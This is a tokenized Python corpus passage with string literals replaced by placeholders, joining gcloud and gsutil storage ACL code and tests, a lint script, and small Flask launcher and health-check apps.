] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : new_acl } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_save_prefefined_invalid ( self ) : <EOL> connection = _Connection ( ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> with self . assertRaises ( ValueError ) : <EOL> acl . save_predefined ( '<STR_LIT>' , client = client ) <EOL> def test_save_predefined_valid ( self ) : <EOL> PREDEFINED = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save_predefined ( PREDEFINED , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:0> ) <EOL> kw = connection . _requested <EOL> self . 
assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : PREDEFINED } ) <EOL> def test_save_predefined_w_XML_alias ( self ) : <EOL> PREDEFINED_XML = '<STR_LIT>' <EOL> PREDEFINED_JSON = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save_predefined ( PREDEFINED_XML , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:0> ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PREDEFINED_JSON } ) <EOL> def test_save_predefined_valid_w_alternate_query_param ( self ) : <EOL> PREDEFINED = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . _PREDEFINED_QUERY_PARAM = '<STR_LIT>' <EOL> acl . save_predefined ( PREDEFINED , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:0> ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . 
assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : PREDEFINED } ) <EOL> def test_clear ( self ) : <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> STICKY = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE2 } <EOL> connection = _Connection ( { '<STR_LIT>' : [ STICKY ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' , ROLE1 ) <EOL> acl . clear ( client = client ) <EOL> self . assertEqual ( list ( acl ) , [ STICKY ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> class Test_BucketACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import BucketACL <EOL> return BucketACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> NAME = '<STR_LIT:name>' <EOL> bucket = _Bucket ( NAME ) <EOL> acl = self . _makeOne ( bucket ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> self . assertTrue ( acl . bucket is bucket ) <EOL> self . assertEqual ( acl . reload_path , '<STR_LIT>' % NAME ) <EOL> self . assertEqual ( acl . 
save_path , '<STR_LIT>' % NAME ) <EOL> class Test_DefaultObjectACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import DefaultObjectACL <EOL> return DefaultObjectACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> NAME = '<STR_LIT:name>' <EOL> bucket = _Bucket ( NAME ) <EOL> acl = self . _makeOne ( bucket ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> self . assertTrue ( acl . bucket is bucket ) <EOL> self . assertEqual ( acl . reload_path , '<STR_LIT>' % NAME ) <EOL> self . assertEqual ( acl . save_path , '<STR_LIT>' % NAME ) <EOL> class Test_ObjectACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import ObjectACL <EOL> return ObjectACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> NAME = '<STR_LIT:name>' <EOL> BLOB_NAME = '<STR_LIT>' <EOL> bucket = _Bucket ( NAME ) <EOL> blob = _Blob ( bucket , BLOB_NAME ) <EOL> acl = self . _makeOne ( blob ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> self . assertTrue ( acl . blob is blob ) <EOL> self . assertEqual ( acl . reload_path , '<STR_LIT>' % ( NAME , BLOB_NAME ) ) <EOL> self . assertEqual ( acl . save_path , '<STR_LIT>' % ( NAME , BLOB_NAME ) ) <EOL> class _Blob ( object ) : <EOL> def __init__ ( self , bucket , blob ) : <EOL> self . bucket = bucket <EOL> self . blob = blob <EOL> @ property <EOL> def path ( self ) : <EOL> return '<STR_LIT>' % ( self . bucket . path , self . blob ) <EOL> class _Bucket ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ property <EOL> def path ( self ) : <EOL> return '<STR_LIT>' % self . 
name <EOL> class _Connection ( object ) : <EOL> _delete_ok = False <EOL> def __init__ ( self , * responses ) : <EOL> self . _responses = responses <EOL> self . _requested = [ ] <EOL> self . _deleted = [ ] <EOL> def api_request ( self , ** kw ) : <EOL> from gcloud . exceptions import NotFound <EOL> self . _requested . append ( kw ) <EOL> response , self . _responses = self . _responses [ <NUM_LIT:0> ] , self . _responses [ <NUM_LIT:1> : ] <EOL> return response <EOL> class _Client ( object ) : <EOL> def __init__ ( self , connection ) : <EOL> self . connection = connection </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> git_root = subprocess . check_output ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . strip ( ) <EOL> os . chdir ( git_root ) <EOL> python_files = subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> python_files = python_files . strip ( ) . split ( ) <EOL> pep8_command = [ '<STR_LIT>' ] + python_files <EOL> status_code = subprocess . call ( pep8_command ) <EOL> sys . exit ( status_code ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import bookshelf <EOL> import config <EOL> app = bookshelf . create_app ( config ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , debug = True ) </s>
<s> import os <EOL> import sys <EOL> from flask import Flask <EOL> PID_FILE = None <EOL> monitor_app = Flask ( __name__ ) <EOL> @ monitor_app . route ( '<STR_LIT>' ) <EOL> def health ( ) : <EOL> if not os . path . exists ( PID_FILE ) : <EOL> return '<STR_LIT>' , <NUM_LIT> <EOL> with open ( PID_FILE , '<STR_LIT:r>' ) as pidfile : <EOL> pid = pidfile . read ( ) <EOL> if not os . path . exists ( '<STR_LIT>' . format ( pid ) ) : <EOL> return '<STR_LIT>' , <NUM_LIT> <EOL> return '<STR_LIT>' , <NUM_LIT:200> <EOL> @ monitor_app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return health ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> PID_FILE = sys . argv [ <NUM_LIT:1> ] <EOL> monitor_app . run ( '<STR_LIT>' , <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from gslib . help_provider import HelpProvider <EOL> _DETAILED_HELP_TEXT = ( """<STR_LIT>""" ) <EOL> class CommandOptions ( HelpProvider ) : <EOL> """<STR_LIT>""" <EOL> help_spec = HelpProvider . HelpSpec ( <EOL> help_name = '<STR_LIT>' , <EOL> help_name_aliases = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help_type = '<STR_LIT>' , <EOL> help_one_line_summary = '<STR_LIT>' , <EOL> help_text = _DETAILED_HELP_TEXT , <EOL> subcommand_help_text = { } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from gslib import aclhelpers <EOL> from gslib . cloud_api import AccessDeniedException <EOL> from gslib . cloud_api import BadRequestException <EOL> from gslib . cloud_api import Preconditions <EOL> from gslib . cloud_api import ServiceException <EOL> from gslib . command import Command <EOL> from gslib . command import SetAclExceptionHandler <EOL> from gslib . command import SetAclFuncWrapper <EOL> from gslib . command_argument import CommandArgument <EOL> from gslib . cs_api_map import ApiSelector <EOL> from gslib . exception import CommandException <EOL> from gslib . help_provider import CreateHelpText <EOL> from gslib . storage_url import StorageUrlFromString <EOL> from gslib . third_party . storage_apitools import storage_v1_messages as apitools_messages <EOL> from gslib . translation_helper import PRIVATE_DEFAULT_OBJ_ACL <EOL> from gslib . util import NO_MAX <EOL> from gslib . util import Retry <EOL> from gslib . util import UrlsAreForSingleProvider <EOL> _SET_SYNOPSIS = """<STR_LIT>""" <EOL> _GET_SYNOPSIS = """<STR_LIT>""" <EOL> _CH_SYNOPSIS = """<STR_LIT>""" <EOL> _SET_DESCRIPTION = """<STR_LIT>""" <EOL> _GET_DESCRIPTION = """<STR_LIT>""" <EOL> _CH_DESCRIPTION = """<STR_LIT>""" <EOL> _SYNOPSIS = ( _SET_SYNOPSIS + _GET_SYNOPSIS . lstrip ( '<STR_LIT:\n>' ) + <EOL> _CH_SYNOPSIS . lstrip ( '<STR_LIT:\n>' ) + '<STR_LIT>' ) <EOL> _DESCRIPTION = """<STR_LIT>""" + '<STR_LIT:\n>' . join ( [ _SET_DESCRIPTION + _GET_DESCRIPTION + _CH_DESCRIPTION ] ) <EOL> _DETAILED_HELP_TEXT = CreateHelpText ( _SYNOPSIS , _DESCRIPTION ) <EOL> _get_help_text = CreateHelpText ( _GET_SYNOPSIS , _GET_DESCRIPTION ) <EOL> _set_help_text = CreateHelpText ( _SET_SYNOPSIS , _SET_DESCRIPTION ) <EOL> _ch_help_text = CreateHelpText ( _CH_SYNOPSIS , _CH_DESCRIPTION ) <EOL> class DefAclCommand ( Command ) : <EOL> """<STR_LIT>""" <EOL> command_spec = Command . 
CreateCommandSpec ( <EOL> '<STR_LIT>' , <EOL> command_name_aliases = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> usage_synopsis = _SYNOPSIS , <EOL> min_args = <NUM_LIT:2> , <EOL> max_args = NO_MAX , <EOL> supported_sub_args = '<STR_LIT>' , <EOL> file_url_ok = False , <EOL> provider_url_ok = False , <EOL> urls_start_arg = <NUM_LIT:1> , <EOL> gs_api_support = [ ApiSelector . XML , ApiSelector . JSON ] , <EOL> gs_default_api = ApiSelector . JSON , <EOL> argparse_arguments = { <EOL> '<STR_LIT>' : [ <EOL> CommandArgument . MakeFileURLOrCannedACLArgument ( ) , <EOL> CommandArgument . MakeZeroOrMoreCloudBucketURLsArgument ( ) <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> CommandArgument . MakeNCloudBucketURLsArgument ( <NUM_LIT:1> ) <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> CommandArgument . MakeZeroOrMoreCloudBucketURLsArgument ( ) <EOL> ] , <EOL> } <EOL> ) <EOL> help_spec = Command . HelpSpec ( <EOL> help_name = '<STR_LIT>' , <EOL> help_name_aliases = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help_type = '<STR_LIT>' , <EOL> help_one_line_summary = '<STR_LIT>' , <EOL> help_text = _DETAILED_HELP_TEXT , <EOL> subcommand_help_text = { <EOL> '<STR_LIT>' : _get_help_text , '<STR_LIT>' : _set_help_text , '<STR_LIT>' : _ch_help_text } , <EOL> ) <EOL> def _CalculateUrlsStartArg ( self ) : <EOL> if not self . args : <EOL> self . RaiseWrongNumberOfArgumentsException ( ) <EOL> if ( self . args [ <NUM_LIT:0> ] . lower ( ) == '<STR_LIT>' or <EOL> self . command_alias_used == '<STR_LIT>' ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _SetDefAcl ( self ) : <EOL> if not StorageUrlFromString ( self . args [ - <NUM_LIT:1> ] ) . IsBucket ( ) : <EOL> raise CommandException ( '<STR_LIT>' % <EOL> self . command_name ) <EOL> try : <EOL> self . SetAclCommandHelper ( SetAclFuncWrapper , SetAclExceptionHandler ) <EOL> except AccessDeniedException : <EOL> self . 
_WarnServiceAccounts ( ) <EOL> raise <EOL> def _GetDefAcl ( self ) : <EOL> if not StorageUrlFromString ( self . args [ <NUM_LIT:0> ] ) . IsBucket ( ) : <EOL> raise CommandException ( '<STR_LIT>' % <EOL> self . command_name ) <EOL> self . GetAndPrintAcl ( self . args [ <NUM_LIT:0> ] ) <EOL> def _ChDefAcl ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parse_versions = True <EOL> self . changes = [ ] <EOL> if self . sub_opts : <EOL> for o , a in self . sub_opts : <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( <EOL> aclhelpers . AclChange ( a , scope_type = aclhelpers . ChangeType . GROUP ) ) <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( <EOL> aclhelpers . AclChange ( a , scope_type = aclhelpers . ChangeType . USER ) ) <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( <EOL> aclhelpers . AclChange ( a , scope_type = aclhelpers . ChangeType . PROJECT ) ) <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( aclhelpers . AclDel ( a ) ) <EOL> if not self . changes : <EOL> raise CommandException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ( not UrlsAreForSingleProvider ( self . args ) or <EOL> StorageUrlFromString ( self . args [ <NUM_LIT:0> ] ) . scheme != '<STR_LIT>' ) : <EOL> raise CommandException ( <EOL> '<STR_LIT>' . format ( <EOL> self . command_name ) ) <EOL> bucket_urls = set ( ) <EOL> for url_arg in self . args : <EOL> for result in self . WildcardIterator ( url_arg ) : <EOL> if not result . storage_url . IsBucket ( ) : <EOL> raise CommandException ( <EOL> '<STR_LIT>' ) <EOL> bucket_urls . add ( result . storage_url ) <EOL> for storage_url in bucket_urls : <EOL> self . ApplyAclChanges ( storage_url ) <EOL> @ Retry ( ServiceException , tries = <NUM_LIT:3> , timeout_secs = <NUM_LIT:1> ) <EOL> def ApplyAclChanges ( self , url ) : <EOL> """<STR_LIT>""" <EOL> bucket = self . gsutil_api . GetBucket ( <EOL> url . bucket_name , provider = url . 
scheme , <EOL> fields = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> current_acl = bucket . defaultObjectAcl <EOL> modification_count = <NUM_LIT:0> <EOL> for change in self . changes : <EOL> modification_count += change . Execute ( <EOL> url , current_acl , '<STR_LIT>' , self . logger ) <EOL> if modification_count == <NUM_LIT:0> : <EOL> self . logger . info ( '<STR_LIT>' , url ) <EOL> return <EOL> if not current_acl : <EOL> current_acl . append ( PRIVATE_DEFAULT_OBJ_ACL ) <EOL> try : <EOL> preconditions = Preconditions ( meta_gen_match = bucket . metageneration ) <EOL> bucket_metadata = apitools_messages . Bucket ( defaultObjectAcl = current_acl ) <EOL> self . gsutil_api . PatchBucket ( url . bucket_name , bucket_metadata , <EOL> preconditions = preconditions , <EOL> provider = url . scheme , fields = [ '<STR_LIT:id>' ] ) <EOL> except BadRequestException as e : <EOL> raise CommandException ( '<STR_LIT>' % str ( e ) ) <EOL> except AccessDeniedException : <EOL> self . _WarnServiceAccounts ( ) <EOL> raise CommandException ( '<STR_LIT>' <EOL> '<STR_LIT>' % url ) <EOL> self . logger . info ( '<STR_LIT>' , url ) <EOL> def RunCommand ( self ) : <EOL> """<STR_LIT>""" <EOL> action_subcommand = self . args . pop ( <NUM_LIT:0> ) <EOL> self . ParseSubOpts ( check_args = True ) <EOL> self . def_acl = True <EOL> self . continue_on_error = False <EOL> if action_subcommand == '<STR_LIT>' : <EOL> func = self . _GetDefAcl <EOL> elif action_subcommand == '<STR_LIT>' : <EOL> func = self . _SetDefAcl <EOL> elif action_subcommand in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> func = self . _ChDefAcl <EOL> else : <EOL> raise CommandException ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % <EOL> ( action_subcommand , self . command_name ) ) <EOL> func ( ) <EOL> return <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import binascii <EOL> from hashlib import sha256 <EOL> import boto <EOL> from gslib . cloud_api import CryptoTuple <EOL> from gslib . exception import CommandException <EOL> _MAX_DECRYPTION_KEYS = <NUM_LIT:100> <EOL> def CryptoTupleFromKey ( crypto_key ) : <EOL> """<STR_LIT>""" <EOL> return CryptoTuple ( crypto_key ) if crypto_key else None <EOL> def FindMatchingCryptoKey ( key_sha256 ) : <EOL> """<STR_LIT>""" <EOL> encryption_key = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> if encryption_key is not None : <EOL> if key_sha256 == Base64Sha256FromBase64EncryptionKey ( encryption_key ) : <EOL> return encryption_key <EOL> for i in range ( _MAX_DECRYPTION_KEYS ) : <EOL> key_number = i + <NUM_LIT:1> <EOL> decryption_key = boto . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' % str ( key_number ) , None ) <EOL> if decryption_key is None : <EOL> break <EOL> elif key_sha256 == Base64Sha256FromBase64EncryptionKey ( decryption_key ) : <EOL> return decryption_key <EOL> def GetEncryptionTuple ( ) : <EOL> """<STR_LIT>""" <EOL> encryption_key = _GetBase64EncryptionKey ( ) <EOL> return CryptoTuple ( encryption_key ) if encryption_key else None <EOL> def GetEncryptionTupleAndSha256Hash ( ) : <EOL> """<STR_LIT>""" <EOL> encryption_key_sha256 = None <EOL> encryption_tuple = GetEncryptionTuple ( ) <EOL> if encryption_tuple : <EOL> encryption_key_sha256 = Base64Sha256FromBase64EncryptionKey ( <EOL> encryption_tuple . crypto_key ) <EOL> return ( encryption_tuple , encryption_key_sha256 ) <EOL> def Base64Sha256FromBase64EncryptionKey ( encryption_key ) : <EOL> return base64 . encodestring ( binascii . unhexlify ( <EOL> _CalculateSha256FromString ( <EOL> base64 . decodestring ( encryption_key ) ) ) ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def _CalculateSha256FromString ( input_string ) : <EOL> sha256_hash = sha256 ( ) <EOL> sha256_hash . update ( input_string ) <EOL> return sha256_hash . 
hexdigest ( ) <EOL> def _GetBase64EncryptionKey ( ) : <EOL> """<STR_LIT>""" <EOL> encryption_key = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> if encryption_key : <EOL> try : <EOL> base64 . decodestring ( encryption_key ) <EOL> except : <EOL> raise CommandException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return encryption_key </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import re <EOL> from gslib import aclhelpers <EOL> from gslib . command import CreateGsutilLogger <EOL> from gslib . cs_api_map import ApiSelector <EOL> from gslib . project_id import PopulateProjectId <EOL> from gslib . storage_url import StorageUrlFromString <EOL> import gslib . tests . testcase as testcase <EOL> from gslib . tests . testcase . integration_testcase import SkipForGS <EOL> from gslib . tests . testcase . integration_testcase import SkipForS3 <EOL> from gslib . tests . util import ObjectToURI as suri <EOL> from gslib . tests . util import unittest <EOL> from gslib . translation_helper import AclTranslation <EOL> from gslib . util import Retry <EOL> PUBLIC_READ_JSON_ACL_TEXT = '<STR_LIT>' <EOL> class TestAclBase ( testcase . GsUtilIntegrationTestCase ) : <EOL> """<STR_LIT>""" <EOL> _set_acl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _get_acl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _set_defacl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _ch_acl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _project_team = '<STR_LIT>' <EOL> _project_test_acl = '<STR_LIT>' % ( _project_team , PopulateProjectId ( ) ) <EOL> @ SkipForS3 ( '<STR_LIT>' ) <EOL> class TestAcl ( TestAclBase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestAcl , self ) . setUp ( ) <EOL> self . sample_uri = self . CreateBucket ( ) <EOL> self . sample_url = StorageUrlFromString ( str ( self . sample_uri ) ) <EOL> self . logger = CreateGsutilLogger ( '<STR_LIT>' ) <EOL> def test_set_invalid_acl_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . 
assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_invalid_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_xml_acl_json_api_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_xml_acl_json_api_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_valid_acl_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ '<STR_LIT>' , obj_uri ] ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] ) <EOL> acl_string3 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . 
assertNotEqual ( acl_string , acl_string2 ) <EOL> self . assertEqual ( acl_string , acl_string3 ) <EOL> def test_set_valid_permission_whitespace_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> acl_string = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , acl_string ) <EOL> acl_string = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , acl_string ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] ) <EOL> def test_set_valid_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _ServiceAccountCredentialsPresent ( ) : <EOL> unittest . skip ( '<STR_LIT>' ) <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ bucket_uri ] , <EOL> return_stdout = True ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ '<STR_LIT>' , bucket_uri ] ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ bucket_uri ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] ) <EOL> acl_string3 = self . RunGsUtil ( self . _get_acl_prefix + [ bucket_uri ] , <EOL> return_stdout = True ) <EOL> self . assertNotEqual ( acl_string , acl_string2 ) <EOL> self . assertEqual ( acl_string , acl_string3 ) <EOL> def test_invalid_canned_acl_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> stderr = self . RunGsUtil ( <EOL> self . _set_acl_prefix + [ '<STR_LIT>' , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . 
assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_valid_def_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = self . CreateBucket ( ) <EOL> obj_uri1 = suri ( self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri1 ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( <EOL> self . _set_defacl_prefix + [ '<STR_LIT>' , suri ( bucket_uri ) ] ) <EOL> obj_uri2 = suri ( self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT>' ) ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri2 ] , <EOL> return_stdout = True ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_defacl_prefix + [ inpath , suri ( bucket_uri ) ] ) <EOL> obj_uri3 = suri ( self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT>' ) ) <EOL> acl_string3 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri3 ] , <EOL> return_stdout = True ) <EOL> self . assertNotEqual ( acl_string , acl_string2 ) <EOL> self . assertIn ( '<STR_LIT>' , acl_string2 ) <EOL> self . assertEqual ( acl_string , acl_string3 ) <EOL> def test_acl_set_version_specific_uri ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = self . CreateVersionedBucket ( ) <EOL> uri = self . CreateObject ( 